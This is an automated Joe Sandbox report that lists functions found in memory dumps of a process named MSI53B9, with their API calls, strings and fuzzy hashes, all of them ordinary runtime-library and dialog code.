Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 1878960ea2eb97722cec61ebb1d741ed2a4e694c610435a3429d7c38669a801c
Instruction ID: 0f07d559673fdf8c3b60c1fde665d3f83cca56ec68b64f07e0ff7e80e2fd1c6b
Opcode Fuzzy Hash: 1878960ea2eb97722cec61ebb1d741ed2a4e694c610435a3429d7c38669a801c
Instruction Fuzzy Hash: 81415E71900219AEEF25EBA4DC85EEF77BDFB58304F0040A6F509E6151EB749B848F61

Function 0087C91F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0087C9A5
_strlen.LIBCMT ref: 0087C9D5
_swprintf.LIBCMT ref: 0087C9F6
_wcschr.LIBVCRUNTIME ref: 0087CA1F
_wcsrchr.LIBVCRUNTIME ref: 0087CA6B

Strings

%08x, xrefs: 0087C9EA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _strlen$_swprintf_wcschr_wcsrchr
String ID: %08x
API String ID: 1593746830-3682738293
Opcode ID: d311f84d731403f7b33dade2d73386beb34b5e68f463faeaba92e0f782313591
Instruction ID: c8c7db595ff7cc08f82445983f1dad106a1861c2e0f97600adbc7ca70b50e0a8
Opcode Fuzzy Hash: d311f84d731403f7b33dade2d73386beb34b5e68f463faeaba92e0f782313591
Instruction Fuzzy Hash: 3041F372904358AAE730E668CC49ABBB7DCFB85710F14452EFA4CE7186D630DD04C662

Function 00887EE5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00888705,?), ref: 00887FBA
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00887FDB

Strings

<html>, xrefs: 00887F29, 00887F62
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00887F34
utf-8"></head>, xrefs: 00887F3F
</html>, xrefs: 00887F8C

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 45c33956df3f1f8a46c435b2be93e05e93b25f0a04d22ba33320497fc4ea3237
Instruction ID: aa2b38ed8ad681459f227be79e9535fa95dd40bb604099ec560fbb1bbfe229ca
Opcode Fuzzy Hash: 45c33956df3f1f8a46c435b2be93e05e93b25f0a04d22ba33320497fc4ea3237
Instruction Fuzzy Hash: 5A31F5721083157AEB25BB289C06FABB7A8FF52320F24410AF510D61C2EF74D909C7A6

Function 0088859C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 008885B5
GetWindowRect.USER32(?,?), ref: 008885DA
ShowWindow.USER32(?,00000005,?), ref: 00888671
SetWindowTextW.USER32(?,00000000), ref: 00888679
ShowWindow.USER32(00000000,00000005), ref: 0088868F

Strings

RarHtmlClassName, xrefs: 0088863B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 34ae09a0684174647653ce9f3b7613faafad8fc493368c44a2c3c5d9acb27159
Instruction ID: 415ebd6d60b51cf94b99c966ca18b4017f6d7fece265fed59a9d8ded796ad5f2
Opcode Fuzzy Hash: 34ae09a0684174647653ce9f3b7613faafad8fc493368c44a2c3c5d9acb27159
Instruction Fuzzy Hash: F3319E31500214EFD725AF649D4CA2BBBA9FB49711F044459FD49AA992EB30E910CBB2

Function 0089930F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008992D3: _free.LIBCMT ref: 008992FC

_free.LIBCMT ref: 0089935D

Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA

_free.LIBCMT ref: 00899368
_free.LIBCMT ref: 00899373
_free.LIBCMT ref: 008993C7
_free.LIBCMT ref: 008993D2
_free.LIBCMT ref: 008993DD
_free.LIBCMT ref: 008993E8

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
Instruction ID: 465b4f414159d33bd9906e71ed4972b32c8547e30c9961abc709a40895e0d6b7
Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
Instruction Fuzzy Hash: 88111D71941B04F6ED21BBB8DC06FCB7B9CFF00710F484819B2E9E6452DAA5A5044762

Function 00890C14 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00890C0B,0088E662), ref: 00890C22
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00890C30
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00890C49
SetLastError.KERNEL32(00000000,?,00890C0B,0088E662), ref: 00890C9B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 20e4df08e1b9e3d51de31876761eecfe20da87e60fa814100b9ecf164e954fe3
Instruction ID: 2084799b026af9b96aa2c955e262a2f6e03c9399f2a4939b113c220787a0f515
Opcode Fuzzy Hash: 20e4df08e1b9e3d51de31876761eecfe20da87e60fa814100b9ecf164e954fe3
Instruction Fuzzy Hash: 6C01883624D7166EBF6937B87C8993B3644FB127B9B38032AF515D54E1FF114C009945

Function 0088C7FD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 0088C817
AcquireSRWLockExclusive, xrefs: 0088C82C
ReleaseSRWLockExclusive, xrefs: 0088C83C

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 6e655e70526bd2ec59c8bf74f446d123c9190e192e3624cc7de4f7515e6dd816
Instruction ID: 25dccbddbed513aa059bff4f38cfcc10148209edc903e1360830c1d8b987ed2a
Opcode Fuzzy Hash: 6e655e70526bd2ec59c8bf74f446d123c9190e192e3624cc7de4f7515e6dd816
Instruction Fuzzy Hash: 1F01F472AC16215B6F202EB09C89AA727D4FB0379A711003AE920D3A44E734C849ABF1

Function 00880050 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 008800AE

Part of subcall function 0087A8E0: GetVersionExW.KERNEL32(?), ref: 0087A905

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008800D0
FileTimeToSystemTime.KERNEL32(?,?), ref: 008800EA
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008800FB
SystemTimeToFileTime.KERNEL32(?,?), ref: 0088010B
SystemTimeToFileTime.KERNEL32(?,?), ref: 00880117

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: f1920e4871fd575b8f7be64496aea2c36141a5d47ca9261f74d607bf494ae012
Instruction ID: be223afd889df3b595a9da379242f8590a2c85840fe64e9061e7f030f99158d6
Opcode Fuzzy Hash: f1920e4871fd575b8f7be64496aea2c36141a5d47ca9261f74d607bf494ae012
Instruction Fuzzy Hash: 3031F67A1083459BC740EFA8C8849ABB7F8FF98704F04491EF999C3210E734D549CB26

Function 00888206 Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0088822A
_memcmp.LIBVCRUNTIME ref: 00888241

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 97d3b588f02821131ee1c54b109f6105f644aebf269debcfe89d3e719729be1e
Instruction ID: 8a72856d5d51f0ad19a43ab7091f52cacd97844f965cf5f44cbef676384124c8
Opcode Fuzzy Hash: 97d3b588f02821131ee1c54b109f6105f644aebf269debcfe89d3e719729be1e
Instruction Fuzzy Hash: CA21A17164050EEBEB447A14CC81E3B7BADFB547A8F144528FC08DA602FBA4DD414791

Function 0087FB02 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0087FB07
EnterCriticalSection.KERNEL32(008B1E74,00000000,?,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?), ref: 0087FB15
new.LIBCMT ref: 0087FB35
new.LIBCMT ref: 0087FB6B
LeaveCriticalSection.KERNEL32(008B1E74,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?,00008000,?), ref: 0087FB8B
LeaveCriticalSection.KERNEL32(008B1E74,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?,00008000,?), ref: 0087FB96

Part of subcall function 0087F930: InitializeCriticalSection.KERNEL32(000001A0,008B1E74,00000000,?,?,0087FB88,00000020,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?), ref: 0087F969
Part of subcall function 0087F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F973
Part of subcall function 0087F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F983

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
String ID:
API String ID: 3919453512-0
Opcode ID: 706a23f07de4c30d949dfab38d3a685edc8a2b162db051827c9b29e0cc4c23b2
Instruction ID: 5baa9be47d7951dff779d9287e89621e792328fa4aa52cc2fe1cb016fb87b212
Opcode Fuzzy Hash: 706a23f07de4c30d949dfab38d3a685edc8a2b162db051827c9b29e0cc4c23b2
Instruction Fuzzy Hash: F1117734A002119BDB04AB69EC69B7D77A4FB45764F404239FA09D7695DB70C800DB51

Function 0089631F Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,008ACBE8,00892674,008ACBE8,?,?,00892213,?,?,008ACBE8), ref: 00896323
_free.LIBCMT ref: 00896356
_free.LIBCMT ref: 0089637E
SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 0089638B
SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896397
_abort.LIBCMT ref: 0089639D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: e1b814437b22720af457af1c8dc091eab9cc6c085725c34e5418fd8c56ffb574
Instruction ID: 4231153b0f1e55ea74e9baa1cdbad6a35c7ef1622ed05e1cccbb6bd34aa12e47
Opcode Fuzzy Hash: e1b814437b22720af457af1c8dc091eab9cc6c085725c34e5418fd8c56ffb574
Instruction Fuzzy Hash: 2BF0A436605A00A6EF163B2C6D4AB1A2669FBC27B1B3D0114F528D2691FF398C216656

Function 0088B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

EndDialog.USER32(?,00000001), ref: 0088B86B
GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0088B881
SetDlgItemTextW.USER32(?,00000065,?), ref: 0088B89B
SetDlgItemTextW.USER32(?,00000066), ref: 0088B8A6

Strings

RENAMEDLG, xrefs: 0088B838

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 5c1aa9bd3a11e94406958737a86e7719e8410b20182cb682b71e2581b85d4c8b
Instruction ID: 8ff6cd5ffb5f2e25ea4c1d50d69bcc353cb76092e2e88a85ff45f0fae7812530
Opcode Fuzzy Hash: 5c1aa9bd3a11e94406958737a86e7719e8410b20182cb682b71e2581b85d4c8b
Instruction Fuzzy Hash: 9801B933980215BAE5156E65AE49F377B6CFBC6B81F100425F604F38A0C775A805D773

Function 00894ADF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00894A90,?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002), ref: 00894AFF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00894B12
FreeLibrary.KERNEL32(00000000,?,?,?,00894A90,?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894B35

Strings

mscoree.dll, xrefs: 00894AF8
CorExitProcess, xrefs: 00894B0A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fad0f224774751c4f78f187d8d8fef06aa96f913a580ed960e3a9863abb00696
Instruction ID: f429bd23515e14841464a57d6a0b25367141f912ce5b91d0af438f789dd55b56
Opcode Fuzzy Hash: fad0f224774751c4f78f187d8d8fef06aa96f913a580ed960e3a9863abb00696
Instruction Fuzzy Hash: 31F08C30A00208BBEB15AFA4DC19FAEBFB8FB09721F000064B805E2660DB748940CB80

Function 008952F0 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00895362
_free.LIBCMT ref: 00895382

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b29951697111c57a1f4fca0642e27b1014e8feb735c51b6f5ab21398cf3e0ed2
Instruction ID: 8747fe84c396113f34d7fa9d63078b4d57acc0dc132bae7646f3044a519195a3
Opcode Fuzzy Hash: b29951697111c57a1f4fca0642e27b1014e8feb735c51b6f5ab21398cf3e0ed2
Instruction Fuzzy Hash: 2641ED32A00604AFDF15EF78C890A6AB7E1FF86314F2945A9E505EB381DB71AD01CB81

Function 008989AF Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008989B8
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008989DB

Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00898A01
_free.LIBCMT ref: 00898A14
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00898A23

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 8ca4591ba8154d3614afc149c8d1917f04c2c6936323f54ac27d4c300e097ba9
Instruction ID: 3fe08374357eefe77364f0a78479071b9851bd9f9308e2fa7b0334ae04ba0aa2
Opcode Fuzzy Hash: 8ca4591ba8154d3614afc149c8d1917f04c2c6936323f54ac27d4c300e097ba9
Instruction Fuzzy Hash: C8017572701626BB2B2176AA6C8CC7B7DADFAC7B61318011AB904D3101DE648C0185B2

Function 008963A3 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00895E43,00895ADF,?,0089634D,00000001,00000364,?,00892213,?,?,008ACBE8), ref: 008963A8
_free.LIBCMT ref: 008963DD
_free.LIBCMT ref: 00896404
SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896411
SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 0089641A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d640150bcfd1aaf0cfc0acd23c60b97179c3fbadc12c3968a885e32628d20f34
Instruction ID: 833cf5278cdcb544681732b4c76651db46177a65da2a34cfdc11d0192cff94de
Opcode Fuzzy Hash: d640150bcfd1aaf0cfc0acd23c60b97179c3fbadc12c3968a885e32628d20f34
Instruction Fuzzy Hash: FC01D676345B0067AF063B686C89B1B2669FBD277573D4128F424D2682FF39CC215266

Function 0089926A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00899282

Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA

_free.LIBCMT ref: 00899294
_free.LIBCMT ref: 008992A6
_free.LIBCMT ref: 008992B8
_free.LIBCMT ref: 008992CA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
